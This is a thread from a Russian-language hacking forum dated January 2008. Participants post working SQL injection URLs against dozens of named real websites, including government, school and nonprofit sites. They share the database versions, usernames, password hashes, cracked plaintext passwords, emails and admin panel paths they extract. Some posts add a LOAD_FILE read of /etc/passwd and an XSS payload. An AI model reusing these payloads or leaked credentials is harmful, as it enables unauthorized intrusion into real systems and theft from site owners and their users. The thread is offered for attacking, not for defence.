techgaz : *2B5D01B5C8ECF867C58B966856AD111E4589B102 : 4.1.18-log

http://www.fotoinfo.net/
http://www.fotoinfo.net/speciale/detail.php?ID=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23/*
Наугад таблицы подгонял ,чёт не получилось, если у кого получится отпишите ради интереса

netpingx

06.01.2008, 07:40

http://www.mysql-hispano.org/page.php?id=3+UNION+SELECT+1,2,3,4,5+from+hispano. users/*

Ded MustD!e

06.01.2008, 07:54

http://www.buggenhout.be/

http://www.buggenhout.be/dienst.asp?id=1+or+1=(SELECT+TOP+1+cast(USERNAME+a s+nvarchar)%2B%27%3A%27%2Bcast(PASSWORD+as+nvarcha r)+from+SEC_USER)--

http://www.brecht.be/

http://www.brecht.be/dienst.asp?id=1+or+1=(SELECT+TOP+1+cast(USERNAME+a s+nvarchar)%2B%27%3A%27%2Bcast(PASSWORD+as+nvarcha r)+from+SEC_USER)--

Tigger

06.01.2008, 15:47

http://www.dynamomania.com

http://www.dynamomania.com/news.php?p=message&id=-31370+union+select+1,2,3,concat_ws(char(58),name,p wd,email),5,6+from+users/*

Дальше через limit

Это пароли от форума!!!

Пароли для админки не подходят=(
Если кто-нибудь найдет пароли для админки- отпишитесь пожалуйста))

Tigger

06.01.2008, 15:48

http://www.greenshift.com/

http://www.greenshift.com/news.php?id=-97+union+select+1,concat(user,char(58),password),3 ,4,5,6,7,8,9,10,11,12+from+mysql.user/*

root:*3AE51E09E8B6540D267826C97259B607120DB332

Помагите расшифровать))

Tigger

06.01.2008, 16:25

http://www.milim.com/news.php?id=-100+union+select+1,2,3,4,5,6,7,8/*

Таблицы подобрать не смог((

Tigger

06.01.2008, 16:35

http://www.welsh-premier.com/news.php?ID=-6121+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+ mysql.users/*
Говорит, что нехватает прав для просмотра
Это наверно можно как-то избежать
Не пинайте ногами)) Я новичок))

Tigger

06.01.2008, 16:56

http://www.eqvitec.com/news.php?id=2&vuosi=2002&uutinen=-24+union+select+1,2,3,4,5,6,7,8+from+admin/*

Подобрал только таблицу...колонки найти не смог((

.Begemot.

06.01.2008, 17:13

chicken.org.au

http://www.chicken.org.au/page.php?id=-4+union+select+0,1,2,3,4,concat(USER(),0x3a,VERSIO N(),0x3a,DATABASE()),6,7,8,9,10,11,12/*

USER:vs28054_1_dbo@wic023u.server-web.com
VERSION:4.0.24-nt-max-log
DATABASE:vs28054_1

http://www.chicken.org.au/page.php?id=-4+union+select+0,1,2,3,4,concat(id,0x3a,login,0x3a ,password),6,7,8,9,10,11,12+from+users/*

Таблица - users
Поля - id,login,password

13:Sarah:sanchez

А®ТеS

06.01.2008, 17:18

Правительство Австралии xD. Au

http://www.gg.gov.au/governorgeneral/content.php?id=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(VERSION (),0x71),0x71),4,5,6,7,8,9,10,11,12,13/*

Ded MustD!e

06.01.2008, 18:00

http://www.tuner.be/

вывод в тайтле

http://www.tuner.be/actu.asp?id=-1+union+select+1,2,3,convert(concat_ws(0x3a,user() ,database(),version())+using+latin1),5,6,7,8,9,10, 11,12,13/*

Tigger

06.01.2008, 18:18

http://www.a2k.org.ua

http://www.a2k.org.ua/news.php?id=-1567+union+select+1,2,3,4,concat_ws(char(58),user, password,email),6,7,8,9,10,11,12,13,14,15,16,17,18 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37+from+users+limit+1,0/*&lng=ua

admin:d23d8b79f575bcc0eedfb8c4e2f13540:repz

Найдите пожалуйста админку и скажите мне=))
Очень прошу...
Только с сайтом ничего не делайте
Заранее спасибо))

Tigger

06.01.2008, 18:42

http://www.voladm.gov.ua

http://www.voladm.gov.ua/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat(login,c har(58),pass),12,13,14+from+users+limit+2,50/*&today=2006.01.24&lang=ukr

Roma:4cb3ab8dc96cc4bb7a5ccd4bb8b57199:gh237

пароли не знаю от чего...

Tigger

06.01.2008, 18:55

http://www.bikeshop.com.ua/news.php?id=-9+union+select+1,2,3,4,5+from+admin/*
Колонки не подобрал=((

Tigger

06.01.2008, 19:02

http://missinternet.kiev.ua/news.php?id=-16+union+select+1,2,3,4,5,6,7+from+mysql.users/*

Достут закрыт((

n0ne

06.01.2008, 19:06

Tigger,

http://www.bikeshop.com.ua/news.php?id=-9+union+select+1,concat_ws(0x3a3a,admin_email_addr ess,admin_password),3,4,5+from+admin/*

http://www.bikeshop.com.ua/admin

n0ne

06.01.2008, 19:10

Tigger,

http://www.eqvitec.com/news.php?id=2&vuosi=2002&uutinen=-24+union+select+1,2,3,4,5,6,concat(uname,0x3a,upas s),8+from+admin/*

http://www.eqvitec.fi/admin/

.Begemot.

06.01.2008, 19:11

laurenceschool.com

http://www.laurenceschool.com/page.php?id=-13+union+select+1,convert(concat(USER(),0x3a,VERSI ON(),0x3a,DATABASE())+using+latin1)/*&title=Links

USER:laurenceschool@10.2.3.30
VERSION:4.1.11-Debian_4sarge7
DATABASE:laurenceschool_com_-_base

dalelane.co.uk

Microsoft Access

Ни одной стандартной таблици :(
Только раскрытие путей и 13 столбцов.

http://dalelane.co.uk/page.php?id=918+union+select+0,1,2,3,4,5,6,7,8,9,1 0,11,12+from+msysobjects+in+'.'

Xszz

06.01.2008, 19:55

http://www.mwh.gov.bh/Tnews.php?id=11+UNION+SELECT+1,user,password,4,5,6 ,7+FROM+users/*

LAEOT

06.01.2008, 20:01

Вот недавно проверял один сайт и вроде бы нашол sql injection.

Вот 2 примера из сайта:
1. я набрал этот url :
http://www.site.com/script.php?file=2-1'

Получил ответ :

Warning: imagecreatefromjpeg() [function.imagecreatefromjpeg]: Unable to access 2-1 in /home/site.com/script.php on line 3

Warning: imagecreatefromjpeg(2-1) [function.imagecreatefromjpeg]: failed to open stream: No such file or directory in /home/site.com/script.php on line 3

Warning: imagesx(): supplied argument is not a valid Image resource in /home/site.com/script.php on line 4

Warning: imagesy(): supplied argument is not a valid Image resource in /home/site.com/script.php on line 5

Warning: imagecopyresized(): supplied argument is not a valid Image resource in /home/site.com/script.php on line 23

Warning: imagedestroy(): supplied argument is not a valid Image resource in /home/site.com/script.php on line 25
-------------------- это первый пример
вопросы от меня:
1. есть ли sql injection?
2. если да,то можете пример дать?
info: што в красном цвете,это текст который я водил в url (2-1')
--------------------
Второй пример:
http://www.site.com/forum.php?id=4686&start=20'
Ответ:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/site.com/forum.php on line 439
------------------
вопросы от меня:
1. есть ли sql injection?
2. если да,то можете пример дать?

Зарание спасибо за ответы!

159932

06.01.2008, 20:15

laeot не флуди !!!
иди в другую тему !!!

Xszz

06.01.2008, 21:00

http://russian.tebyan.net/Sites/default.php?id=-5898+UNION+SELECT+1,concat(user,char(58),password) ,3,4,5,6,7,8,9,10,11,12,13,14,15+FROM+mysql.user/*

Tigger

06.01.2008, 23:33

http://www.centurymedia.com/

http://www.centurymedia.com/us/news.php?artist_ID=-31+union+select+1,2,3,user,5,6+from+mysql.user/*

Еще есть колонка password, но там только один пароли((

Tigger

06.01.2008, 23:58

http://www.rtg.us/

http://www.rtg.us/news.php?mode=detail&id=-3+union+select+1,concat(name,char(58),password),3, 4,5,6,7,8+from+admins/*

admin : puhhema

Админка: http://www.rtg.us/admin

Пароль к FTP не подходит

Через limit вытащил еще пользователей, но не проверял...
Может там и будут для FTP

.Begemot.

07.01.2008, 00:00

forestenterprise.com

http://www.forestenterprise.com/page.php?id=-23+union+select+0,concat(USER(),0x3a,VERSION(),0x3 a,DATABASE( )),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28/*

USER:fealtd@localhost
VERSION:4.1.22
DATABASE:fealtd

http://www.forestenterprise.com/page.php?id=-23+union+select+0,concat(user,0x3a,password),2,3,4 ,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27,28+from+mysql.user/*

Таблица - mysql.user
Поля - user,password

fealtd:674bea6212f90cad

Tigger

07.01.2008, 00:55

http://www.exploresouthbend.org/news.php?id=-96+union+select+1,2,3,4,5/*

таблицу подобрать не получилось((

Tigger

07.01.2008, 01:00

http://www.ezgulik.org/news.php?id=-274+union+select+1,2,3,4,5,6/*&status=2

таблицу подобрать не получилось((

Tigger

07.01.2008, 01:10

http://www.acluhawaii.org/news.php?id=-210+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*

таблицу подобрать не получилось((

159932

07.01.2008, 01:12

www.eaim.ru
http://www.eaim.ru/news.php?idw=-1964+union+select+1,concat_ws(0x3a,LOGIN,PASSWORD) ,3,4+from+b_user+limit+0,1/*
5.0.45-log
admin:2b4e4ba8e41a2beeff4f60e3f2010900

Tigger

07.01.2008, 01:24

http://www.globalwaterfoundation.org/news.php?id=-1+union+select+1,2,3+from+wma_users/*

Колонки не подобрал((

Tigger

07.01.2008, 01:27

http://www.chicagomediaaction.org/news.php?id=-419+union+select+1,2,3,4,5,6,7,8/*

Таблицу не подобрал

Tigger

07.01.2008, 01:39

http://www.pdma.org/

http://www.pdma.org/news.php?ID=213+union+select+1,concat(user,char(58 ),password),3,4,5,6,7,8,9,10+from+mysql.user/*

root:0cfc2076799e429f:hippo

еще есть таблица user

http://www.pdma.org/news.php?ID=213+union+select+1,2,3,4,5,6,7,8,9,10+ from+user/*

Но колонки подпбрать не смог

Tigger

07.01.2008, 01:46

http://www.dadcomehome.org/

http://www.dadcomehome.org/news.php?strid=1217&id=-2408+union+select+1,concat(username,char(58),passw ord),3,4,5,6,7,8,9,10,11,12,13,14+from+users/

admin:9a997d8da071c76edc7aa3e9a89b251d

Tigger

07.01.2008, 01:48

http://www.tabdc.org/news.php?id=-67+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5/*

159932

07.01.2008, 01:56

Tigger клей посты аднака !!!

Tigger

07.01.2008, 01:59

http://www.eurowizja.org/

http://www.eurowizja.org/news.php?id=-1149+union+select+1,table_name,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16+from+information_schema.tables+lim it+1,48/*

Tigger

07.01.2008, 02:00

Хорошо...сначала наберу матириала, а потом выложу=))

Tigger

07.01.2008, 02:17

http://www.ezgulik.org/news.php?id=-197+union+select+1,2,3,4,5,6/*&status=2

http://www.grfoundation.org/news.php?id=-110+union+select+1,2,3,4,5,6,7,8,9,10/*

http://www.seacoastrugby.org/

http://www.seacoastrugby.org/news.php?id=-141+union+select+1,2,concat(username,char(58),pass word,char(58),email),4+from+mos_users/*

admin:f749b2d0d046218a980aa301950d6aa7:rugbyboy

Админку не нашел

Ded MustD!e

07.01.2008, 02:48

Че-то за мной все стали оранджевым писать, плагиат однако, надо было копирайты ставить)))

http://www.proactiva.com.sv/

http://www.proactiva.com.sv/lanzamiento_det.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6,7,8,9/*

http://www.delcamino.org.sv/

http://www.delcamino.org.sv/newsDetail.php?id=-1+union+select+1,concat_ws(0x3a,user(),version(),d atabase()),3,4,5,6,7,8,9,10,11,12,13,14/*

http://www.nombredejesus.gob.sv/

http://www.nombredejesus.gob.sv/pages/noticias.php?id=-1+union+select+1,2,aes_decrypt(aes_encrypt(concat_ ws(0x3a,user,password),0x78),0x78),4,5,6,7+from+my sql.user/*

root:0ba072e62d7711e2

http://www.mag.gob.sv/ Министерство Агрокультуры Сальвадора))))

http://www.mag.gob.sv/main/index.php?id=-1'+union+select+1,2,3,concat_ws(0x3a,user,password ),5,6,7,8,9,10+from+mysql.user/*&mostrar=full&secc=98&nivel=&tabs=4&pivote=1&ids=97

root:2fa7f6d5676bffd5

Таблица админа:

http://www.mag.gob.sv/main/index.php?id=-1'+union+select+1,2,3,concat_ws(0x3a,usuario,passw ord),5,6,7,8,9,10+from+agroelsalvador.admin_emark+ limit+0,1/*&mostrar=full&secc=98&nivel=&tabs=4&pivote=1&ids=97

Колонка password также содержится в

banner : phpads_affiliates
encuestas:users
moodle:mdl_course
moodle:mdl_course_request
moodle:mdl_hotpot
moodle:mdl_lesson
moodle:mdl_lesson_default
moodle:mdl_quiz
moodle:mdl_user
moodle:mdl_workshop
openreports:REPORT_DATASOURCE
openreports:REPORT_USER

Мускул 5, кому надо, тот расковыряет...

Leone_510

07.01.2008, 06:24

http://www.ultraproducts.com/

http://www.ultraproducts.com/st_content.php?id=-1+union+select+1,2,concat(user_name,0x3b,password) +from+users+limit+0,1/*

А®ТеS

07.01.2008, 06:58

2Ded MustD!e: ыыы, сделаю красным пожалуй :))).
Опять .AU, надеюсь никого еще этим не задолбал :).
http://my.highway1.com.au/
http://my.highway1.com.au/news.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,convert(concat_ws(0 x3A,username,password)+using+latin1),10,11,12,13,1 4,15+from+users/*
О чем сайт я не понял. По URL'у /admin/ по идее распологаеться админка, к которой доступ 403 Forbidden. Также рекомендую посмотреть крайне информативный robots.txt, что этим хотели сказать я также не понял ;). Для тех, кто интересуеться, есть file_priv:

http://my.highway1.com.au/news.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,convert(LOAD_FILE(c har(47,101,116,99,47,112,97,115,115,119,100))+usin g+latin1),10,11,12,13,14,15+from+users/*

Вот только magic_quotes=on, так что идея получить шелл через скуль обрубаеться на корню.
http://www.ellaways.com.au/

http://www.ellaways.com.au/news.php?id=-1+UNION+SELECT+1,2,USER(),4,5,6,7,8,9/*

Вообщем сайт тоже очень непонятный по контенту :(. Зато есть админка и даже с правом доступа в директории /admin/ Вот только аккаунта админа я не знаю, т.к. таблицы я не подобрал :(.

.Begemot.

07.01.2008, 14:50

nahostfocus.de

http://www.nahostfocus.de/page.php?id=-1534+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13, 14,15,concat(USER(),0x3a,VERSION(),0x3a,DATABASE() ),17/*

USER:ftp23972@waldorf.webpack.hosteurope.de
VERSION:5.0.32-Debian_7etch1~bpo.1-log
DATABASE:nahostfocus_de 13

http://www.nahostfocus.de/page.php?id=-1534+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13, 14,15,concat(table_name),17+from+information_schem a.tables/*

http://www.nahostfocus.de/page.php?id=-1534+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13, 14,15,concat(column_name),17+from+information_sche ma.columns/*

А®ТеS

07.01.2008, 16:06

.AU
http://www.unicentral.net.au/

http://www.unicentral.net.au/news.php?id=-1+UNION+SELECT+1,2,convert(concat_ws(0x3A,admin_na me,admin_password)+using+latin1),4,5,6+FROM+admin+ LIMIT+0,1/*

Подобрал таблицу и поля, аккаунт в /admin/ не подходит =\
http://www.spcc.nsw.edu.au/

http://www.spcc.nsw.edu.au/news.php?action=show&news_id=-1+UNION+SELECT+VERSION(),2,3,4,5,6/*

Таблицы подобрать неполучилось

~EviL~

07.01.2008, 17:40

2 trumps

Concat - конкатенция строк. Не нужно писать concat(column_name) FROM что-то, пиши просто column_name FROM что-то :)

2 all

http://gaffa.dk/

http://gaffa.dk/nyheder/view.php/news_id=-17392+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(con cat(version(),0x3a,user(),0x3a,database()),0x71),0 x71),4,5,6,7,8,9,10,11,12,13,14,15,16/*
4.1.11-Debian_4sarge8-log:gaffa@localhost:gaffa

http://www.gearjunkies.com/

http://www.gearjunkies.com/news_info.php?news_id=731+UNION+SELECT+1,concat_ws (0x3a,version(),user(),database())/*
4.0.24-log:gj_web_user@localhost:gearjunkies

http://www.moteurnature.com/

http://www.moteurnature.com/actu/uneactu.php?news_id=-464+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),us er(),database()),5,6,7/*
4.0.25-standard-log:moteurnaactua@10.0.64.29:moteurnaactua

http://youarenotalone.bg/

http://youarenotalone.bg/main/singleNews.php?news_id=-347'+UNION+SELECT+1,concat_ws(0x3a,version(),user( ),database()),3,4,5,6,7,8,9,10,11,12,13/*
5.0.30-Debian_3-log:notalone@localhost:notalone

http://youarenotalone.bg/main/singleNews.php?news_id=-347'+UNION+SELECT+1,concat_ws(0x3a,id,username,pas sword,email),3,4,5,6,7,8,9,10,11,12,13+FROM+admin+ LIMIT+5,1/*
1:standart:7b204c168a0c76ef3a93c4ee78dc3b7a:::stan dart
8:notalone:b37876218b4aff603cccd55d41fd7338:::alon enot
...

http://www.krepsinis.net/

http://www.krepsinis.net/news.php?news_id=-75176+UNION+SELECT+1,concat_ws(0x3a,version(),user (),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20/*
5.0.22-log:sportotiltas1@192.168.69.21:krepsinis

http://www.krepsinis.net/news.php?news_id=-75176+UNION+SELECT+1,concat_ws(0x3a,USER_NAME,PASS WORD,EMAIL),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20+FROM+users+LIMIT+0,1/*
Setonas:66666:Saulius_p@one.lt (логин справа =)
...

http://www.alteragate.net/

http://www.alteragate.net/index.php?news_id=-2310+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(conc at_ws(0x3a,version(),user(),database()),0x71),0x71 ),4/*
4.1.15-log:forum_admin@localhost:forum_db

http://www.alteragate.net/index.php?news_id=-2310+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(conc at_ws(0x3a,username,user_password,user_email),0x71 ),0x71),4+FROM+phpbb_users+WHERE+user_id=5/*
(http://forum.alteragate.net/)
Silver Elf:315eb115d98fcbad39ffc5edebd669c9:silver.elf@al teragate.net::qweasdzxc
Lord Sirax:b0a2507b88288f07c66cc3398f380052:lord.sirax@ alteragate.net::salamander
Angela_angel:6c30734811916b0f0f24a4630b08036f:ange la_angel@abv.bg::1234321
...

Tigger

07.01.2008, 19:51

http://r2.com.au/news.php?page=6&id=-37+union+select+1,2,3,4,5/*
-----------------------------------------------------------------------

http://www.recipeforhappiness.com.au/news.php?p=shw&id=-101+union+select+1,2,3,4,5,6,7,8+from+admin/*
Колонки подобрать не получилось
-----------------------------------------------------------------------

http://www.ecoaction.com.au/news.php?id=-40+union+select+1,2,3,concat(username,char(58),pas sword),5,6+from+users/*
admin:m3mph15
-----------------------------------------------------------------------

http://nsw.cchr.org.au/news.php?id=-62+union+select+table_name,2,3,4,5+from+informatio n_schema.tables/*
-----------------------------------------------------------------------

http://www.swiss.org.au/news.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19/*
-----------------------------------------------------------------------

http://www.4id.com.au/news.php?action=show&news_id=-1+union+select+1,concat(username,char(58),password ),3+from+users/*
-----------------------------------------------------------------------

http://www.screenact.act.gov.au/news.php?action=index&id=-6+union+select+1/*
-----------------------------------------------------------------------

http://www.applehomeloan.com.au/news.php?id=-73+union+select+1,2,3,4/*
-----------------------------------------------------------------------

http://www.puo.pl/news.php?id=-40+union+select+1,2,3,4,5,6/*&backlink=/
-----------------------------------------------------------------------

http://www.proszowki-basen.pl/news.php?id=-186+union+select+1,2,3,table_name,5,6,7,8,9,10,11, 12+from+information_schema.tables+limit+1,100/*
-----------------------------------------------------------------------

http://www.zieloni.org.pl/news.php?id=-3670+union+select+1,2,3,table_name,5,6,7,8,9,10,11 +from+information_schema.tables+limit+1,100/*&PHPSESSID=d541b457ccf042d5d0efd1c85a3234de
-----------------------------------------------------------------------

http://www.ukraine-emb.pl/pl/news.php?id=-271+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
-----------------------------------------------------------------------

http://www.azs.agh.edu.pl/news.php?id=-258+union+select+1,2,3,4,5,concat(name,char(58),pa ssword),7+from+users/*
Админка: http://www.azs.agh.edu.pl/logon.php
dosin:zadzior
codzio:warkastrong
sekretariat:rena21ta
kip9:nuvedewiu8eevr
Rino:rinoonir
-----------------------------------------------------------------------

http://www.turystyka.org.pl/news.php?id=-60'+union+select+1,2,3,4,5,6,7,8,9/*
-----------------------------------------------------------------------

http://www.am-strategies.com/en/news.php?ID=-149+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws (char(58),login,password,email),13,14,15,16,17,18, 19,20,21,22,23,24,25,26,27,28,29,30+from+users/*
admin:test:support@e-commatrix.com
http://am-strategies.com/admin пароль не подходит
-----------------------------------------------------------------------

http://www.bfexplode.de/en/news.php?id=-11+union+select+1,2,password,4+from+users/*
Колонки не нашел((
-----------------------------------------------------------------------

http://audit.kharkov.com/en/news.php?id=-126+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20+from+information_schema.tables/*
Есть таблица phpbb_users
-----------------------------------------------------------------------

http://www.focifum.com/en/news.php?list=0&ID=-7+union+select+1,2,3,4,5,6/*
-----------------------------------------------------------------------

http://www.ekobus.cz/en/news.php?id=-1169768767+union+select+1,2,concat(user,char(58),p ass),4+from+admin/*&lan=en
bus:buPJAuU2.yYGM DES(UNIX)
Админка: http://www.ekobus.cz/admin/
-----------------------------------------------------------------------

http://www.qanat.info/news.php?id=-98+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22/*&mode=en
-----------------------------------------------------------------------

http://fph.tu.ac.th/en/news.php?id=-15+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*&cate=1
-----------------------------------------------------------------------

http://www.audica.co.uk/en/news.php?id=-13+union+select+1,2,3,4,5+from+users/*
-----------------------------------------------------------------------

http://www.le-temps-suspendu.com/revesdesagas/en/news.php?id=-37+union+select+1,2,version(),4/*

-----------------------------------------------------------------------

http://www.xeltek.com.cn/en/news.php?id=-30+union+select+1,2,3,4,5,6/*

P.S Сильно не ругайте))

1NtR0

07.01.2008, 19:55

http://www.abruzzoverdeblu.it/?id=-67+union+select+1,2,3,4,user(),6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23/*

http://www.fuorissimo.it/php-bin/joke/users.php?ID=-1+union+select+1,2,3,4,user(),6,7,8,9,10,11,12/*

http://www.casoniatuttabirra.it/artista.php?id=-1+union+select+1,2,3,4,user(),6,7/*

Tigger

07.01.2008, 21:47

http://www.tigella.it/news.php?ID=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
-----------------------------------------------------------------------

http://www.fondopriamo.it/news.php?id=-189+union+select+1,2,3,concat(user,char(58),passwo rd),5,6,7,8+from+mysql.user/*

Пароль не отображается((

.Begemot.

07.01.2008, 22:14

edinteractive.co.uk

http://www.edinteractive.co.uk/article/?id=-48+union+select+0,1,concat(USER(),0x3a,VERSION(),0 x3a,DATABASE()),3,4,5,6/*

USER:ediadmin@scary
VERSION:5.0.45-community-log
DATABASE:edi

http://www.edinteractive.co.uk/article/?id=-48+union+select+0,1,2,column_name,4,5,6+from+infor mation_schema.columns/* - названия всех колонок

http://www.edinteractive.co.uk/article/?id=-48+union+select+0,1,2,table_name,4,5,6+from+inform ation_schema.tables/* - названия всех таблиц

Имя проекта CMC )
http://www.edinteractive.co.uk/article/?id=-48+union+select+0,1,2,concat(id,0x3a,project_name, 0x3a,website_link),4,5,6+from+aei_portfolio/*

K1nD[e]R

08.01.2008, 00:29

http://www.naushko.ru/whisper.php?id=-3887+union+select+1,2,3,concat_ws(0x2F,userid,name ,pass,email),5,6+from+users+limit+2,2/*
Version 5.026

name/pass/mail

Руслан/asdsdf/ruslan@yusufov.com
Perfecto/prf/ruperfecto@yandex.ru

~EviL~

08.01.2008, 01:31

http://www.afa.org.tw/

http://www.afa.org.tw/news_detail.php?news_id=-33+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(),u ser(),database()),6,7,8,9/*
4.1.20:afa@localhost:afa

http://www.afa.org.tw/news_detail.php?news_id=-33+UNION+SELECT+1,2,3,4,admin_password,6,7,8,9+FRO M+admin/*
a65660c1c91cd0a717c1d3ebc7f66c68 (если кому-то надо, админка тут: http://www.afa.org.tw/admin/, а мыло: info@afa.org.tw)

http://www.afa.org.tw/news_detail.php?news_id=-33+UNION+SELECT+1,2,3,4,concat_ws(0x3a,username,us er_password,user_email),6,7,8,9+FROM+phpbb_users+L IMIT+1,1/*
JChen:b51699d453f963ae42af5b37563e3ab2:spetsnaz@ms 29.hinet.net
...

P.S. Кажись сайт китайский, а я удивлялся почему у них форум какой-то левый :D

Tigger

08.01.2008, 01:34

http://www.studiolegalebartolini.it/news.php?id=-66+union+select+1,2,3,4,5,6/*
-----------------------------------------------------------------------
http://www.ipmaroma2008.it/news.php?ID=-00017+union+select+1,2,3,4,5,6/*
-----------------------------------------------------------------------
http://www.kanzlei-tmfg.de/news.php?id=-10+union+select+1,2,table_name+from+information_sc hema.tables/*&r=25
Все таблицы
http://www.kanzlei-tmfg.de/news.php?id=-10+union+select+1,2,column_name+from+information_s chema.columns/*&r=25
Все колонки
А дальше сами))
-----------------------------------------------------------------------
http://www.bppa.at/de/news.php?id=-18+union+select+1,2,3,4/*
-----------------------------------------------------------------------
http://metfan.de/news.php?id=-258+union+select+1,2,3,4,5,6,7,8,9/*

~EviL~

08.01.2008, 01:58

2 Tigger

Доводи инъекции до конца или хотя бы выводи version(), user(), database().
Не оставляй просто так, только подобрав поля. Смысла нет =\

2 all =)

http://www.livingstonfc.co.uk/newsdet.php?news_id=-399+UNION+SELECT+1,2,concat_ws(0x3a,version(),user (),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23/*&type_id=1
4.0.24:user12325072_1@superultra19.

http://www.livingstonfc.co.uk/newsdet.php?news_id=-399+UNION+SELECT+1,2,concat_ws(0x3a,name,user_pass ),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23+FROM+users/*&type_id=1
Not important:tractor

http://www.zik.com.ua/

http://www.zik.com.ua/index.php?news_id=45555+UNION+SELECT+1,concat_ws(0 x3a,version(),user(),database()),3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
4.1.22-log:zik@localhost:zik

http://www.nisc.lt/

http://www.nisc.lt/lt/news.php?news_id=205+UNION+SELECT+1,2,concat_ws(0x 3a,version(),user(),database()),4,5/*
5.0.27-log:nisc@mysql50:nisc

http://www.nisc.lt/lt/news.php?news_id=205+UNION+SELECT+1,2,convert(tabl e_name+using+latin1),4,5+FROM+information_schema.t ables/*
1: admin:fa2a336347b0da6f022232868d831c73: aivaras@knotdesign.com
9: martinas:16f48b6a5ffdf2665c25dba0a58df350: martinas@nisc.lt
10: olia:ade9fb3441b9794e97329a4adf2b4939: olia@nisc.lt

SWAT

08.01.2008, 04:05

http://www.teasetrip.com/tnews.php?op=tnews&id=-447+union+select+1,2,3,4,5,concat(login,0x3a,pass) ,7,8,9,10,11+from+users+limit+1,1/*

http://www.actupix.net/tnews.php?op=tnews&id=-56+union+select+1,2,3,4,5,concat(login,0x3a,pass), 7,8,9,10,11,12+from+users/*

Isis

08.01.2008, 05:24

http://i.vmashine.ru/images/welcome_3.gif http://vmashine.ru - В Машине.ру

Настройки своей страницы -> Управление автомобилями -> Добавление автомобиля -> Самое первое поле <options> так вот все value у <select> не фильтруются....заменяем value у любого параметра каким-нибудь firebug'om на -1 или '+blabla , ну вообщем все как делаете обычно только пост запросами....

Еще можно узнать локальный путь через сессии....подрезав их (c) ettte

Ded MustD!e

08.01.2008, 06:34

http://www.cultura.usb.ve/

http://www.cultura.usb.ve/noticia.php?id=-1+union+select+1,2,3,convert(concat_ws(0x3a,user() ,database(),version())+using+latin1),5,6,7,8,9,10, 11/*

http://www.davidluna.com.ve/

http://www.davidluna.com.ve/index.php?ID=-1+union+select+1,2,concat_ws(0x3a,login,password), 4,5,6+from+login/*

http://www.forosocialmundial.org.ve/

http://www.forosocialmundial.org.ve/noticia_mas.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),databas e(),version()),5,6,7,8,9,10/*

http://www.tiburonesdelaguaira.com.ve/

http://www.tiburonesdelaguaira.com.ve/mostrar_noticia.php?id=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12 +from+information_schema.tables+limit+0,1/*

http://www.vaspuntofijo.com.ve/

http://www.vaspuntofijo.com.ve/repuestos.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version())/*

http://galeria.uc.edu.ve/

http://galeria.uc.edu.ve/noticias.php?id=-1+union+select+1,concat_ws(0x3a,user,password),3,4 +from+mysql.user/*

root:*822F83E1D728CFD3D28DC5D309DE95F0EAC258E9

.Begemot.

08.01.2008, 11:38

turkystan.kz

http://www.turkystan.kz/page.php?page_id=36&id=-1526+union+select+0,USER(),VERSION(),DATABASE()/*

USER:turkesdb@hosting.isd.kz
VERSION:4.1.22
DATABASE:turkesdb

http://www.turkystan.kz/page.php?page_id=36&id=-1526+union+select+0,concat(ID,0x3a,login,0x3a,pass word),2,3+from+users/*

Таблица - users
Поля - id,login,password

1:admin:51a71aa84f5e79ad

XSS через SQL)
http://www.turkystan.kz/page.php?page_id=36&id=-1526+union+select+0,'%3Cscript%3Ealert(/XSS/)%3C/script%3E',2,3+from+users/*

ThreeD

08.01.2008, 13:42

www.topwebhosts.org

http://www.topwebhosts.org/directory/view-host.php?id=-66+union+select+1,2,3,concat_ws(0x3A3a,version(),d atabase(),user()),5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27/*

5.0.22::topwebhosts::apache@localhost

159932

08.01.2008, 15:00

http://www.alexterp.ru/index.php?page=-204+union+select+concat(table_name,0x3a3a3a),2,3,4 +from+information_schema.tables+limit+0,1/*
5.0.45-log
но в базе ничо с пасами не нащёл
----------------------------------------------------------------------
www.travelhit.pl
